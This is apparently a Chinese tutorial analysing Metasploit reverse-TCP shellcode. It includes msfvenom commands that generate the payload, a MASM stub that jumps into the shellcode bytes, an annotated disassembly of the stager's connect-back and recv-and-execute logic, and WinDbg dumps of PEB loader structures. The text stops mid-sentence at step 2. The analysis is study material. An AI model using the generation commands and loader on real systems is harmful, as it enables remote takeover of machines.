shellcode生成
在kali中使用metsploit生成shellcode,分别生成db、raw格式,用于分析。
msfvenom -p windows/shell/reverse_tcp LHOST=kalihost -f raw -o shellcode.raw
msfvenom -p windows/shell/reverse_tcp LHOST=kalihost -f num -o shellcode.db
为了得到一个可执行shellcode方便调试,使用masm编写一个跳入shellcode的程序
.686p
.mmx
.model flat,stdcall
include windows.inc
.data
shellcode db 0fch, 0e8h, 082h, 000h, 000h, 000h, 060h, 089h, 0e5h, 031h, 0c0h, 064h, 08bh, 050h, 030h
;...
.code
start:
xor eax,eax
lea eax,shellcode
call eax
end start
分析汇编代码
使用ndisasm工具得到shellcode汇编代码。
ndisasm -b 32 shellcode.raw > shellcode.asm
00000000 FC cld
00000001 E882000000 call dword 0x88 ;get dll name & addr
00000006 60 pushad
00000007 89E5 mov ebp,esp
00000009 31C0 xor eax,eax
0000000B 648B5030 mov edx,[fs:eax+0x30] ;TEB->PEB
0000000F 8B520C mov edx,[edx+0xc] ;PEB_LDR_DATA
00000012 8B5214 mov edx,[edx+0x14] ;InMernoryOrderModuleList->&_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks
00000015 8B7228 mov esi,[edx+0x28] ;BaseDllName(Unicode)
00000018 0FB74A26 movzx ecx,word [edx+0x26];Name Length
0000001C 31FF xor edi,edi ;Name Hash
0000001E AC lodsb
0000001F 3C61 cmp al,0x61
00000021 7C02 jl 0x25
00000023 2C20 sub al,0x20
00000025 C1CF0D ror edi,byte 0xd
00000028 01C7 add edi,eax
0000002A E2F2 loop 0x1e
0000002C 52 push edx
0000002D 57 push edi
0000002E 8B5210 mov edx,[edx+0x10] ;DllBase;
00000031 8B4A3C mov ecx,[edx+0x3c] ;PE.AddressOfNewExeHeader
00000034 8B4C1178 mov ecx,[ecx+edx+0x78] ;PE2.LoaderFlags DLL.MajorOperatingSystemVersion
00000038 E348 jecxz 0x82
0000003A 01D1 add ecx,edx
0000003C 51 push ecx
0000003D 8B5920 mov ebx,[ecx+0x20]
00000040 01D3 add ebx,edx
00000042 8B4918 mov ecx,[ecx+0x18]
00000045 E33A jecxz 0x81
00000047 49 dec ecx
00000048 8B348B mov esi,[ebx+ecx*4]
0000004B 01D6 add esi,edx
0000004D 31FF xor edi,edi
0000004F AC lodsb
00000050 C1CF0D ror edi,byte 0xd
00000053 01C7 add edi,eax
00000055 38E0 cmp al,ah
00000057 75F6 jnz 0x4f
00000059 037DF8 add edi,[ebp-0x8]
0000005C 3B7D24 cmp edi,[ebp+0x24]
0000005F 75E4 jnz 0x45
00000061 58 pop eax
00000062 8B5824 mov ebx,[eax+0x24]
00000065 01D3 add ebx,edx
00000067 668B0C4B mov cx,[ebx+ecx*2]
0000006B 8B581C mov ebx,[eax+0x1c]
0000006E 01D3 add ebx,edx
00000070 8B048B mov eax,[ebx+ecx*4]
00000073 01D0 add eax,edx
00000075 89442424 mov [esp+0x24],eax
00000079 5B pop ebx
0000007A 5B pop ebx
0000007B 61 popad
0000007C 59 pop ecx
0000007D 5A pop edx
0000007E 51 push ecx
0000007F FFE0 jmp eax
00000081 5F pop edi
00000082 5F pop edi ;Next Module
00000083 5A pop edx
00000084 8B12 mov edx,[edx]
00000086 EB8D jmp short 0x15
00000088 5D pop ebp ;call from 0x01
00000089 6833320000 push dword 0x3233
0000008E 687773325F push dword 0x5f327377 ;"ws2_32"
00000093 54 push esp
00000094 684C772607 push dword 0x726774c ;kernal32.dll hash
00000099 FFD5 call ebp
0000009B B890010000 mov eax,0x190
000000A0 29C4 sub esp,eax
000000A2 54 push esp
000000A3 50 push eax
000000A4 6829806B00 push dword 0x6b8029
000000A9 FFD5 call ebp
000000AB 50 push eax
000000AC 50 push eax
000000AD 50 push eax
000000AE 50 push eax
000000AF 40 inc eax
000000B0 50 push eax
000000B1 40 inc eax
000000B2 50 push eax
000000B3 68EA0FDFE0 push dword 0xe0df0fea
000000B8 FFD5 call ebp
000000BA 97 xchg eax,edi
000000BB 6A05 push byte +0x5
000000BD 68C0A8CF89 push dword 0x89cfa8c0
000000C2 680200115C push dword 0x5c110002
000000C7 89E6 mov esi,esp
000000C9 6A10 push byte +0x10
000000CB 56 push esi
000000CC 57 push edi
000000CD 6899A57461 push dword 0x6174a599
000000D2 FFD5 call ebp
000000D4 85C0 test eax,eax
000000D6 740A jz 0xe2
000000D8 FF4E08 dec dword [esi+0x8]
000000DB 75EC jnz 0xc9
000000DD E83F000000 call dword 0x121
000000E2 6A00 push byte +0x0
000000E4 6A04 push byte +0x4
000000E6 56 push esi
000000E7 57 push edi
000000E8 6802D9C85F push dword 0x5fc8d902
000000ED FFD5 call ebp
000000EF 83F800 cmp eax,byte +0x0
000000F2 7EE9 jng 0xdd
000000F4 8B36 mov esi,[esi]
000000F6 6A40 push byte +0x40
000000F8 6800100000 push dword 0x1000
000000FD 56 push esi
000000FE 6A00 push byte +0x0
00000100 6858A453E5 push dword 0xe553a458
00000105 FFD5 call ebp
00000107 93 xchg eax,ebx
00000108 53 push ebx
00000109 6A00 push byte +0x0
0000010B 56 push esi
0000010C 53 push ebx
0000010D 57 push edi
0000010E 6802D9C85F push dword 0x5fc8d902
00000113 FFD5 call ebp
00000115 83F800 cmp eax,byte +0x0
00000118 7EC3 jng 0xdd
0000011A 01C3 add ebx,eax
0000011C 29C6 sub esi,eax
0000011E 75E9 jnz 0x109
00000120 C3 ret
00000121 BBF0B5A256 mov ebx,0x56a2b5f0
00000126 6A00 push byte +0x0
00000128 53 push ebx
00000129 FFD5 call ebp
关键步骤
1.利用FS段寄存器指向的TEB中PEB结构找到DLL模块基址。
typedef struct _PEB { // Size: 0x1D8
/*000*/ UCHAR InheritedAddressSpace;
/*001*/ UCHAR ReadImageFileExecOptions;
/*002*/ UCHAR BeingDebugged;
/*003*/ UCHAR SpareBool; // Allocation size
/*004*/ HANDLE Mutant;
/*008*/ HINSTANCE ImageBaseAddress; // Instance
/*00C*/ VOID *DllList;
/*010*/ PPROCESS_PARAMETERS *ProcessParameters;
/*014*/ ULONG SubSystemData;
/*018*/ HANDLE DefaultHeap;
/*01C*/ KSPIN_LOCK FastPebLock;
/*020*/ ULONG FastPebLockRoutine;
/*024*/ ULONG FastPebUnlockRoutine;
/*028*/ ULONG EnvironmentUpdateCount;
/*02C*/ ULONG KernelCallbackTable;
/*030*/ LARGE_INTEGER SystemReserved;
/*038*/ ULONG FreeList;
/*03C*/ ULONG TlsExpansionCounter;
/*040*/ ULONG TlsBitmap;
/*044*/ LARGE_INTEGER TlsBitmapBits;
/*04C*/ ULONG ReadOnlySharedMemoryBase;
/*050*/ ULONG ReadOnlySharedMemoryHeap;
/*054*/ ULONG ReadOnlyStaticServerData;
/*058*/ ULONG AnsiCodePageData;
/*05C*/ ULONG OemCodePageData;
/*060*/ ULONG UnicodeCaseTableData;
/*064*/ ULONG NumberOfProcessors;
/*068*/ LARGE_INTEGER NtGlobalFlag; // Address of a local copy
/*070*/ LARGE_INTEGER CriticalSectionTimeout;
/*078*/ ULONG HeapSegmentReserve;
/*07C*/ ULONG HeapSegmentCommit;
/*080*/ ULONG HeapDeCommitTotalFreeThreshold;
/*084*/ ULONG HeapDeCommitFreeBlockThreshold;
/*088*/ ULONG NumberOfHeaps;
/*08C*/ ULONG MaximumNumberOfHeaps;
/*090*/ ULONG ProcessHeaps;
/*094*/ ULONG GdiSharedHandleTable;
/*098*/ ULONG ProcessStarterHelper;
/*09C*/ ULONG GdiDCAttributeList;
/*0A0*/ KSPIN_LOCK LoaderLock;
/*0A4*/ ULONG OSMajorVersion;
/*0A8*/ ULONG OSMinorVersion;
/*0AC*/ USHORT OSBuildNumber;
/*0AE*/ USHORT OSCSDVersion;
/*0B0*/ ULONG OSPlatformId;
/*0B4*/ ULONG ImageSubsystem;
/*0B8*/ ULONG ImageSubsystemMajorVersion;
/*0BC*/ ULONG ImageSubsystemMinorVersion;
/*0C0*/ ULONG ImageProcessAffinityMask;
/*0C4*/ ULONG GdiHandleBuffer[0x22];
/*14C*/ ULONG PostProcessInitRoutine;
/*150*/ ULONG TlsExpansionBitmap;
/*154*/ UCHAR TlsExpansionBitmapBits[0x80];
/*1D4*/ ULONG SessionId;
} PEB, *PPEB;
0:000> !peb
PEB at 00215000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
BeingDebugged: Yes
ImageBaseAddress: 00400000
Ldr 7732ebe0
Ldr.Initialized: Yes
Ldr.InInitializationOrderModuleList: 004c2ea8 . 004c3fc8
Ldr.InLoadOrderModuleList: 004c2fa0 . 004c3fb8
Ldr.InMemoryOrderModuleList: 004c2fa8 . 004c3fc0
Base TimeStamp Module
400000 57e92185 Sep 26 21:24:21 2016 E:\WorkSpace\shellcode\t.exe
77220000 57b7e09e Aug 20 12:46:22 2016 C:\WINDOWS\SYSTEM32\ntdll.dll
75470000 57898ef6 Jul 16 09:33:42 2016 C:\WINDOWS\System32\KERNEL32.DLL
759a0000 57cf98b1 Sep 07 12:33:53 2016 C:\WINDOWS\System32\KERNELBASE.dll
70740000 57898eeb Jul 16 09:33:31 2016 C:\WINDOWS\system32\apphelp.dll
SubSystemData: 00000000
ProcessHeap: 004c0000
ProcessParameters: 004c18e0
CurrentDirectory: 'C:\Program Files (x86)\Windows Kits\10\Debuggers\'
WindowTitle: 'E:\WorkSpace\shellcode\t.exe'
ImageFile: 'E:\WorkSpace\shellcode\t.exe'
CommandLine: 'E:\WorkSpace\shellcode\t.exe'
DllPath: '< Name not readable >'
Environment: 004c09c8
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\youmu\AppData\Roaming
CommonProgramFiles=C:\Program Files (x86)\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=DESKTOP-53KKBMH
ComSpec=C:\WINDOWS\system32\cmd.exe
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
HOMEDRIVE=C:
HOMEPATH=\Users\youmu
LANG=zh_CN
LOCALAPPDATA=C:\Users\youmu\AppData\Local
LOGONSERVER=\\DESKTOP-53KKBMH
MOZ_PLUGIN_PATH=D:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\
NUMBER_OF_PROCESSORS=4
OS=Windows_NT
Path=C:\Program Files (x86)\Windows Kits\10\Debuggers\x86;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Windows Kits\8.1\Windows Performance Toolkit\;C:\Python27;D:\Program Files\010 Editor;D:\Program\nasm-2.12.02-win32\nasm-2.12.02;D:\Program\putty;C:\Users\youmu\AppData\Local\Microsoft\WindowsApps;
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 60 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=3c03
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files (x86)
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PSModulePath=C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\Users\youmu\AppData\Local\Temp
TMP=C:\Users\youmu\AppData\Local\Temp
USERDOMAIN=DESKTOP-53KKBMH
USERDOMAIN_ROAMINGPROFILE=DESKTOP-53KKBMH
USERNAME=youmu
USERPROFILE=C:\Users\youmu
VBOX_MSI_INSTALL_PATH=C:\Program Files\Oracle\VirtualBox\
VS140COMNTOOLS=C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\Tools\
WINDBG_DIR=C:\Program Files (x86)\Windows Kits\10\Debuggers\x86
windir=C:\WINDOWS
0:000> dt _PEB @$peb
ntdll!_PEB
+0x000 InheritedAddressSpace : 0 ''
+0x001 ReadImageFileExecOptions : 0 ''
+0x002 BeingDebugged : 0x1 ''
+0x003 BitField : 0 ''
+0x003 ImageUsesLargePages : 0y0
+0x003 IsProtectedProcess : 0y0
+0x003 IsImageDynamicallyRelocated : 0y0
+0x003 SkipPatchingUser32Forwarders : 0y0
+0x003 IsPackagedProcess : 0y0
+0x003 IsAppContainer : 0y0
+0x003 IsProtectedProcessLight : 0y0
+0x003 IsLongPathAwareProcess : 0y0
+0x004 Mutant : 0xffffffff Void
+0x008 ImageBaseAddress : 0x00400000 Void
+0x00c Ldr : 0x7732ebe0 _PEB_LDR_DATA
+0x010 ProcessParameters : 0x004c18e0 _RTL_USER_PROCESS_PARAMETERS
+0x014 SubSystemData : (null)
+0x018 ProcessHeap : 0x004c0000 Void
+0x01c FastPebLock : 0x7732e9a0 _RTL_CRITICAL_SECTION
+0x020 AtlThunkSListPtr : (null)
+0x024 IFEOKey : (null)
+0x028 CrossProcessFlags : 1
+0x028 ProcessInJob : 0y1
+0x028 ProcessInitializing : 0y0
+0x028 ProcessUsingVEH : 0y0
+0x028 ProcessUsingVCH : 0y0
+0x028 ProcessUsingFTH : 0y0
+0x028 ReservedBits0 : 0y000000000000000000000000000 (0)
+0x02c KernelCallbackTable : (null)
+0x02c UserSharedInfoPtr : (null)
+0x030 SystemReserved : [1] 0
+0x034 AtlThunkSListPtr32 : (null)
+0x038 ApiSetMap : 0x00040000 Void
+0x03c TlsExpansionCounter : 0
+0x040 TlsBitmap : 0x7732eb80 Void
+0x044 TlsBitmapBits : [2] 0x10001
+0x04c ReadOnlySharedMemoryBase : 0x7fea0000 Void
+0x050 SparePvoid0 : (null)
+0x054 ReadOnlyStaticServerData : 0x7fea0730 -> (null)
+0x058 AnsiCodePageData : 0x7ffa0000 Void
+0x05c OemCodePageData : 0x7ffa0000 Void
+0x060 UnicodeCaseTableData : 0x7ffd0028 Void
+0x064 NumberOfProcessors : 4
+0x068 NtGlobalFlag : 0x70
+0x070 CriticalSectionTimeout : _LARGE_INTEGER 0xffffe86d`079b8000
+0x078 HeapSegmentReserve : 0x100000
+0x07c HeapSegmentCommit : 0x2000
+0x080 HeapDeCommitTotalFreeThreshold : 0x10000
+0x084 HeapDeCommitFreeBlockThreshold : 0x1000
+0x088 NumberOfHeaps : 1
+0x08c MaximumNumberOfHeaps : 0x10
+0x090 ProcessHeaps : 0x7732d6c0 -> 0x004c0000 Void
+0x094 GdiSharedHandleTable : (null)
+0x098 ProcessStarterHelper : (null)
+0x09c GdiDCAttributeList : 0
+0x0a0 LoaderLock : 0x7732c3b8 _RTL_CRITICAL_SECTION
+0x0a4 OSMajorVersion : 0xa
+0x0a8 OSMinorVersion : 0
+0x0ac OSBuildNumber : 0x3839
+0x0ae OSCSDVersion : 0
+0x0b0 OSPlatformId : 2
+0x0b4 ImageSubsystem : 3
+0x0b8 ImageSubsystemMajorVersion : 4
+0x0bc ImageSubsystemMinorVersion : 0
+0x0c0 ActiveProcessAffinityMask : 0xf
+0x0c4 GdiHandleBuffer : [34] 0
+0x14c PostProcessInitRoutine : (null)
+0x150 TlsExpansionBitmap : 0x7732eb70 Void
+0x154 TlsExpansionBitmapBits : [32] 1
+0x1d4 SessionId : 6
+0x1d8 AppCompatFlags : _ULARGE_INTEGER 0x0
+0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER 0x0
+0x1e8 pShimData : 0x001b0000 Void
+0x1ec AppCompatInfo : (null)
+0x1f0 CSDVersion : _UNICODE_STRING ""
+0x1f8 ActivationContextData : (null)
+0x1fc ProcessAssemblyStorageMap : (null)
+0x200 SystemDefaultActivationContextData : 0x001a0000 _ACTIVATION_CONTEXT_DATA
+0x204 SystemAssemblyStorageMap : (null)
+0x208 MinimumStackCommit : 0
+0x20c FlsCallback : (null)
+0x210 FlsListHead : _LIST_ENTRY [ 0x215210 - 0x215210 ]
+0x218 FlsBitmap : 0x7732eba8 Void
+0x21c FlsBitmapBits : [4] 1
+0x22c FlsHighIndex : 0
+0x230 WerRegistrationData : (null)
+0x234 WerShipAssertPtr : (null)
+0x238 pUnused : (null)
+0x23c pImageHeaderHash : (null)
+0x240 TracingFlags : 0
+0x240 HeapTracingEnabled : 0y0
+0x240 CritSecTracingEnabled : 0y0
+0x240 LibLoaderTracingEnabled : 0y0
+0x240 SpareTracingBits : 0y00000000000000000000000000000 (0)
+0x248 CsrServerReadOnlySharedMemoryBase : 0x00007ff7`4fa00000
+0x250 TppWorkerpListLock : 0
+0x254 TppWorkerpList : _LIST_ENTRY [ 0x215254 - 0x215254 ]
+0x25c WaitOnAddressHashTable : [128] (null)
typedef struct _PEB_LDR_DATA
{
ULONG Length; // +0x00
BOOLEAN Initialized; // +0x04
PVOID SsHandle; // +0x08
LIST_ENTRY InLoadOrderModuleList; // +0x0c
LIST_ENTRY InMemoryOrderModuleList; // +0x14
LIST_ENTRY InInitializationOrderModuleList;// +0x1c
} PEB_LDR_DATA,*PPEB_LDR_DATA; // +0x24
0:000> dt _PEB_LDR_DATA @edx
ntdll!_PEB_LDR_DATA
+0x000 Length : 0x30
+0x004 Initialized : 0x1 ''
+0x008 SsHandle : (null)
+0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x4c2fa0 - 0x4c3fb8 ]
+0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x4c2fa8 - 0x4c3fc0 ]
+0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x4c2ea8 - 0x4c3fc8 ]
+0x024 EntryInProgress : (null)
+0x028 ShutdownInProgress : 0 ''
+0x02c ShutdownThreadId : (null)
typedef struct _LIST_ENTRY {
struct _LIST_ENTRY *Flink;
struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY, *RESTRICTED_POINTER PRLIST_ENTRY;
0:000> dt _LIST_ENTRY @edx+0x14
ntdll!_LIST_ENTRY
[ 0x4c2fa8 - 0x4c3fc0 ]
+0x000 Flink : 0x004c2fa8 _LIST_ENTRY [ 0x4c2ea0 - 0x7732ebf4 ]
+0x004 Blink : 0x004c3fc0 _LIST_ENTRY [ 0x7732ebf4 - 0x4c36a8 ]
typedef struct _LDR_DATA_TABLE_ENTRY
{
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
WORD LoadCount;
WORD TlsIndex;
union
{
LIST_ENTRY HashLinks;
struct
{
PVOID SectionPointer;
ULONG CheckSum;
};
};
union
{
ULONG TimeDateStamp;
PVOID LoadedImports;
};
_ACTIVATION_CONTEXT * EntryPointActivationContext;
PVOID PatchInformation;
LIST_ENTRY ForwarderLinks;
LIST_ENTRY ServiceTagLinks;
LIST_ENTRY StaticLinks;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
0:000> dt _LDR_DATA_TABLE_ENTRY @edx-0x8
ntdll!_LDR_DATA_TABLE_ENTRY
+0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x4c2e98 - 0x7732ebec ]
+0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x4c2ea0 - 0x7732ebf4 ]
+0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
+0x018 DllBase : 0x00400000 Void
+0x01c EntryPoint : 0x00401000 Void
+0x020 SizeOfImage : 0x3000
+0x024 FullDllName : _UNICODE_STRING "E:\WorkSpace\shellcode\t.exe"
+0x02c BaseDllName : _UNICODE_STRING "t.exe"
+0x034 FlagGroup : [4] "???"
+0x034 Flags : 0x80002acc
+0x034 PackagedBinary : 0y0
+0x034 MarkedForRemoval : 0y0
+0x034 ImageDll : 0y1
+0x034 LoadNotificationsSent : 0y1
+0x034 TelemetryEntryProcessed : 0y0
+0x034 ProcessStaticImport : 0y0
+0x034 InLegacyLists : 0y1
+0x034 InIndexes : 0y1
+0x034 ShimDll : 0y0
+0x034 InExceptionTable : 0y1
+0x034 ReservedFlags1 : 0y10
+0x034 LoadInProgress : 0y0
+0x034 LoadConfigProcessed : 0y1
+0x034 EntryProcessed : 0y0
+0x034 ProtectDelayLoad : 0y0
+0x034 ReservedFlags3 : 0y00
+0x034 DontCallForThreads : 0y0
+0x034 ProcessAttachCalled : 0y0
+0x034 ProcessAttachFailed : 0y0
+0x034 CorDeferredValidate : 0y0
+0x034 CorImage : 0y0
+0x034 DontRelocate : 0y0
+0x034 CorILOnly : 0y0
+0x034 ReservedFlags5 : 0y000
+0x034 Redirected : 0y0
+0x034 ReservedFlags6 : 0y00
+0x034 CompatDatabaseProcessed : 0y1
+0x038 ObsoleteLoadCount : 0xffff
+0x03a TlsIndex : 0
+0x03c HashLinks : _LIST_ENTRY [ 0x4c3ff4 - 0x7732eaa0 ]
+0x044 TimeDateStamp : 0x57e92185
+0x048 EntryPointActivationContext : (null)
+0x04c Lock : (null)
+0x050 DdagNode : 0x004c3060 _LDR_DDAG_NODE
+0x054 NodeModuleLink : _LIST_ENTRY [ 0x4c3060 - 0x4c3060 ]
+0x05c LoadContext : (null)
+0x060 ParentDllBase : (null)
+0x064 SwitchBackContext : 0x772210b4 Void
+0x068 BaseAddressIndexNode : _RTL_BALANCED_NODE
+0x074 MappingInfoIndexNode : _RTL_BALANCED_NODE
+0x080 OriginalBase : 0x400000
+0x088 LoadTime : _LARGE_INTEGER 0x01d21999`c5c40e73
+0x090 BaseNameHashValue : 0xc81af258
+0x094 LoadReason : 4 ( LoadReasonDynamicLoad )
+0x098 ImplicitPathOptions : 0
+0x09c ReferenceCount : 2
+0x0a0 DependentLoadFlags : 0
2.通过模块名称hash值找到k
参考